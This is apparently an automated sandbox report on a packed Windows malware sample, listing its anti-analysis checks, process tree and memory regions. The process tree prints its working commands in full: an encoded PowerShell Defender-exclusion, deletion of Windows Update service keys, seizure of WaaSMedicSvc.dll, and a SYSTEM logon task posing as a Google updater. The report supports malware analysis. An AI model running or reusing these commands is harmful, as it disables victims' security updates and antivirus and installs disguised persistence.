Analysis
-
max time kernel
44s -
max time network
49s -
platform
windows7_x64 -
resource
win7-20220715-en -
resource tags
arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system -
submitted
03-08-2022 10:15
Behavioral task
behavioral1
Sample
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
Resource
win7-20220715-en
General
-
Target
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
-
Size
7.1MB
-
MD5
322cf2f6a67420e4eb53f29263a639ba
-
SHA1
bc91f56c260ff4484f7fb0d33a3d351d3d812781
-
SHA256
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025
-
SHA512
3e58b83f26950059901ad1cbb20a06351b7a815d17a3e65a0a84061b7d0d9af588a2685786c28642b1bb76575c81b272d10a1b1dede515b643b27ea52deadcc7
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe -
Drops file in Drivers directory 1 IoCs
Processes:
conhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 1628 takeown.exe 520 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 1628 takeown.exe 520 icacls.exe -
Processes:
resource yara_rule behavioral1/memory/736-54-0x0000000000400000-0x000000000106F000-memory.dmp themida behavioral1/memory/736-55-0x0000000000400000-0x000000000106F000-memory.dmp themida -
Processes:
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exepid process 736 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe -
Drops file in Program Files directory 2 IoCs
Processes:
conhost.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe conhost.exe File opened for modification C:\Program Files\Google\Chrome\updater.exe conhost.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 1384 sc.exe 824 sc.exe 1636 sc.exe 1516 sc.exe 1648 sc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 2032 reg.exe 2044 reg.exe 568 reg.exe 968 reg.exe 332 reg.exe 1312 reg.exe 1456 reg.exe 1944 reg.exe 2020 reg.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.execonhost.exepid process 1932 powershell.exe 864 conhost.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowercfg.exepowercfg.execonhost.exepowercfg.exepowercfg.exetakeown.exedescription pid process Token: SeDebugPrivilege 1932 powershell.exe Token: SeShutdownPrivilege 1788 powercfg.exe Token: SeShutdownPrivilege 1096 powercfg.exe Token: SeDebugPrivilege 864 conhost.exe Token: SeShutdownPrivilege 2028 powercfg.exe Token: SeShutdownPrivilege 1124 powercfg.exe Token: SeTakeOwnershipPrivilege 1628 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.execonhost.execmd.execmd.exedescription pid process target process PID 736 wrote to memory of 864 736 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe conhost.exe PID 736 wrote to memory of 864 736 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe conhost.exe PID 736 wrote to memory of 864 736 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe conhost.exe PID 736 wrote to memory of 864 736 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe conhost.exe PID 864 wrote to memory of 1932 864 conhost.exe powershell.exe PID 864 wrote to memory of 1932 864 conhost.exe powershell.exe PID 864 wrote to memory of 1932 864 conhost.exe powershell.exe PID 864 wrote to memory of 1060 864 conhost.exe cmd.exe PID 864 wrote to memory of 1060 864 conhost.exe cmd.exe PID 864 wrote to memory of 1060 864 conhost.exe cmd.exe PID 864 wrote to memory of 1744 864 conhost.exe cmd.exe PID 864 wrote to memory of 1744 864 conhost.exe cmd.exe PID 864 wrote to memory of 1744 864 conhost.exe cmd.exe PID 1060 wrote to memory of 1384 1060 cmd.exe sc.exe PID 1060 wrote to memory of 1384 1060 cmd.exe sc.exe PID 1060 wrote to memory of 1384 1060 cmd.exe sc.exe PID 1744 wrote to memory of 1788 1744 cmd.exe powercfg.exe PID 1744 wrote to memory of 1788 1744 cmd.exe powercfg.exe PID 1744 wrote to memory of 1788 1744 cmd.exe powercfg.exe PID 1060 wrote to memory of 824 1060 cmd.exe sc.exe PID 1060 wrote to memory of 824 1060 cmd.exe sc.exe PID 1060 wrote to memory of 824 1060 cmd.exe sc.exe PID 1060 wrote to memory of 1636 1060 cmd.exe sc.exe PID 1060 wrote to memory of 1636 1060 cmd.exe sc.exe PID 1060 wrote to memory of 1636 1060 cmd.exe sc.exe PID 1060 wrote to memory of 1516 1060 cmd.exe sc.exe PID 1060 wrote to memory of 1516 1060 cmd.exe sc.exe PID 1060 wrote to memory of 1516 1060 cmd.exe sc.exe PID 1744 wrote to memory of 1096 1744 cmd.exe powercfg.exe PID 1744 wrote to memory of 1096 1744 cmd.exe powercfg.exe PID 1744 wrote to memory of 1096 1744 cmd.exe powercfg.exe PID 1060 wrote to memory of 1648 1060 cmd.exe sc.exe PID 1060 wrote to memory of 1648 1060 cmd.exe sc.exe PID 1060 wrote to memory of 1648 1060 cmd.exe sc.exe PID 1060 wrote to memory of 2020 1060 cmd.exe reg.exe PID 1060 wrote to memory of 2020 1060 cmd.exe reg.exe PID 1060 wrote to memory of 2020 1060 cmd.exe reg.exe PID 1744 wrote to memory of 2028 1744 cmd.exe powercfg.exe PID 1744 wrote to memory of 2028 1744 cmd.exe powercfg.exe PID 1744 wrote to memory of 2028 1744 cmd.exe powercfg.exe PID 1060 wrote to memory of 568 1060 cmd.exe reg.exe PID 1060 wrote to memory of 568 1060 cmd.exe reg.exe PID 1060 wrote to memory of 568 1060 cmd.exe reg.exe PID 1060 wrote to memory of 2032 1060 cmd.exe reg.exe PID 1060 wrote to memory of 2032 1060 cmd.exe reg.exe PID 1060 wrote to memory of 2032 1060 cmd.exe reg.exe PID 1744 wrote to memory of 1124 1744 cmd.exe powercfg.exe PID 1744 wrote to memory of 1124 1744 cmd.exe powercfg.exe PID 1744 wrote to memory of 1124 1744 cmd.exe powercfg.exe PID 1060 wrote to memory of 968 1060 cmd.exe reg.exe PID 1060 wrote to memory of 968 1060 cmd.exe reg.exe PID 1060 wrote to memory of 968 1060 cmd.exe reg.exe PID 1060 wrote to memory of 332 1060 cmd.exe reg.exe PID 1060 wrote to memory of 332 1060 cmd.exe reg.exe PID 1060 wrote to memory of 332 1060 cmd.exe reg.exe PID 1060 wrote to memory of 1628 1060 cmd.exe takeown.exe PID 1060 wrote to memory of 1628 1060 cmd.exe takeown.exe PID 1060 wrote to memory of 1628 1060 cmd.exe takeown.exe PID 1060 wrote to memory of 520 1060 cmd.exe icacls.exe PID 1060 wrote to memory of 520 1060 cmd.exe icacls.exe PID 1060 wrote to memory of 520 1060 cmd.exe icacls.exe PID 864 wrote to memory of 988 864 conhost.exe cmd.exe PID 864 wrote to memory of 988 864 conhost.exe cmd.exe PID 864 wrote to memory of 988 864 conhost.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe"C:\Users\Admin\AppData\Local\Temp\1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe"2⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdAB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAegBhAHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbgBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZwBuACMAPgA="3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/332-83-0x0000000000000000-mapping.dmp
-
memory/520-85-0x0000000000000000-mapping.dmp
-
memory/568-79-0x0000000000000000-mapping.dmp
-
memory/736-55-0x0000000000400000-0x000000000106F000-memory.dmpFilesize
12.4MB
-
memory/736-57-0x00000000771B0000-0x0000000077359000-memory.dmpFilesize
1.7MB
-
memory/736-54-0x0000000000400000-0x000000000106F000-memory.dmpFilesize
12.4MB
-
memory/820-97-0x0000000000000000-mapping.dmp
-
memory/824-72-0x0000000000000000-mapping.dmp
-
memory/864-56-0x0000000000230000-0x000000000064E000-memory.dmpFilesize
4.1MB
-
memory/864-58-0x000000001B820000-0x000000001BC3E000-memory.dmpFilesize
4.1MB
-
memory/864-59-0x000007FEFBA31000-0x000007FEFBA33000-memory.dmpFilesize
8KB
-
memory/896-96-0x0000000000000000-mapping.dmp
-
memory/952-87-0x0000000000000000-mapping.dmp
-
memory/968-82-0x0000000000000000-mapping.dmp
-
memory/988-86-0x0000000000000000-mapping.dmp
-
memory/1060-68-0x0000000000000000-mapping.dmp
-
memory/1096-75-0x0000000000000000-mapping.dmp
-
memory/1124-81-0x0000000000000000-mapping.dmp
-
memory/1284-95-0x0000000000000000-mapping.dmp
-
memory/1312-90-0x0000000000000000-mapping.dmp
-
memory/1384-70-0x0000000000000000-mapping.dmp
-
memory/1384-100-0x0000000000000000-mapping.dmp
-
memory/1456-91-0x0000000000000000-mapping.dmp
-
memory/1516-74-0x0000000000000000-mapping.dmp
-
memory/1628-84-0x0000000000000000-mapping.dmp
-
memory/1636-73-0x0000000000000000-mapping.dmp
-
memory/1648-76-0x0000000000000000-mapping.dmp
-
memory/1684-89-0x0000000000000000-mapping.dmp
-
memory/1708-88-0x0000000000000000-mapping.dmp
-
memory/1720-99-0x0000000000000000-mapping.dmp
-
memory/1744-69-0x0000000000000000-mapping.dmp
-
memory/1748-98-0x0000000000000000-mapping.dmp
-
memory/1788-71-0x0000000000000000-mapping.dmp
-
memory/1932-66-0x00000000025E4000-0x00000000025E7000-memory.dmpFilesize
12KB
-
memory/1932-67-0x00000000025EB000-0x000000000260A000-memory.dmpFilesize
124KB
-
memory/1932-65-0x000000001B740000-0x000000001BA3F000-memory.dmpFilesize
3.0MB
-
memory/1932-64-0x00000000025E4000-0x00000000025E7000-memory.dmpFilesize
12KB
-
memory/1932-63-0x000007FEEC670000-0x000007FEED1CD000-memory.dmpFilesize
11.4MB
-
memory/1932-62-0x000007FEED1D0000-0x000007FEEDBF3000-memory.dmpFilesize
10.1MB
-
memory/1932-60-0x0000000000000000-mapping.dmp
-
memory/1944-92-0x0000000000000000-mapping.dmp
-
memory/2020-77-0x0000000000000000-mapping.dmp
-
memory/2028-78-0x0000000000000000-mapping.dmp
-
memory/2032-80-0x0000000000000000-mapping.dmp
-
memory/2040-94-0x0000000000000000-mapping.dmp
-
memory/2044-93-0x0000000000000000-mapping.dmp